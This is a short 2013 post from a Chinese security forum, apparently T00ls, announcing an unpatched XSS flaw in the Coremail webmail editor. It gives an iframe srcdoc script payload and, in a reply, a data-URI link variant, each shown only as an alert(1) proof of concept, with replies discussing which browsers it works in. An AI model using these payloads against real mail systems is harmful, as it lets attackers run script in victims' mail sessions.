来个coremail XSS 0day

2013-06-15 11:20:23 9 lusiyu 4773

coremail 神马东西不用说了

写邮件时源码编辑
<iframe srcdoc='<script>alert(1)</script>
'>

chrome下XSS 成功

类别 Web安全

关于作者

lusiyu7篇文章238篇回复

评论9次

要评论？请先登录或注册

9楼

stephen
2013-7-7 12:11

IE8试试

回复|@ta|踩(0)|顶(0)
8楼

粉丿丶兜兜
2013-6-23 23:17

应该是怎么显示的啊你直接用代码方式粘贴不就行了不要普通粘贴

回复|@ta|踩(0)|顶(0)
7楼

web安全测试
2013-6-20 16:35

这个好啊我们能做些什么啊

回复|@ta|踩(0)|顶(0)
6楼

t00ls管理团队01
2013-6-15 23:17

截个图传个图片吧。

回复|@ta|踩(0)|顶(0)
5楼

lusiyu
2013-6-15 22:05

单引号内输入的是实体字符但给显示成字母了。

回复|@ta|踩(0)|顶(0)
4楼

t00ls管理团队01
2013-6-15 11:30

只针对chrome？土司哪里显示有问题？

回复|@ta|踩(0)|顶(0)
3楼

lusiyu
2013-6-15 11:23

这个漏洞也不难找

回复|@ta|踩(0)|顶(0)
2楼

lusiyu
2013-6-15 11:22

<a href="data或者实体字符“>点我</a>能够通杀所有浏览器但不够主动

回复|@ta|踩(0)|顶(0)
1楼

lusiyu
2013-6-15 11:21

土司显示不正确单引号里面都是实体字符的

回复|@ta|踩(0)|顶(0)

热门文章

安全资讯你的朋友被黑客入侵了，你会是下一个吗？

某个亲近的人，无论是朋友、亲戚还是同事，其宝贵的在线账户被盗 ...

2025-05-02 01:01:09 16 2133

渗透测试投稿文章：在cron中添加隐藏计划任务

## 原理`/etc/crontab`文件是系统级计划任务配置，几乎没有人修 ...

2025-05-14 14:56:40 11 7396

安全资讯调查显示甲骨文云服务器确实被攻击并泄露数据但甲骨文始终没有承认

早前名为 rose87168 的黑客发帖称在 2025 年 2 月份入侵 Oracle ...

2025-03-31 17:08:33 7 2381

安全资讯FUNSTAT - Telegram有人索引了大量用户的公开信息并做成bot可供所有人查询

用自己的号测试了下，收集的信息非常全面，包括了你的用户名变更 ...

2025-03-25 08:17:56 32 4285

安全资讯谷歌推出紧急安全更新修复Chrome零日漏洞

在安全报告中研究人员透露黑客利用该漏洞实现浏览器沙盒逃逸，并 ...

2025-03-28 00:51:26 8 2677

精华推荐

渗透测试利用Java反射和类加载机制绕过JSP后门检测

### 0x00：前言 JSP后门，一般是指文件名以.jsp等后缀结尾的， ...

2018-05-20 20:13:32 11 16911

逆向破解某VPN客户端远程下载文件执行模拟逆向分析

# 某VPN客户端远程下载文件执行模拟逆向分析## 前言2021年3月， ...

2022-08-29 10:04:23 60 2730

渗透测试某金融app的加解密hook+rpc+绕过SSLPinning抓包

## 0x01 抓包### 1.1 burp抓包测试(抓不到)### 1.2 httpcanaryHt ...

2023-03-07 21:57:51 65 21172

渗透测试【奇技淫巧】【对某相亲网的一次渗透】--过程详细到另我自己都发指【2016五一快乐-详情首发】

自认为整个过程写的非常详细，虽然此文章我发表到某平台，但是没 ...

2016-05-01 09:44:34 106 3320

渗透测试JAVA安全 | Classloader：理解与利用一篇就够了

# 前言ClassLoader 作为 JAVA 安全研究基础又核心的部分, 本篇文 ...

2024-09-19 16:44:44 19 910

Top ↑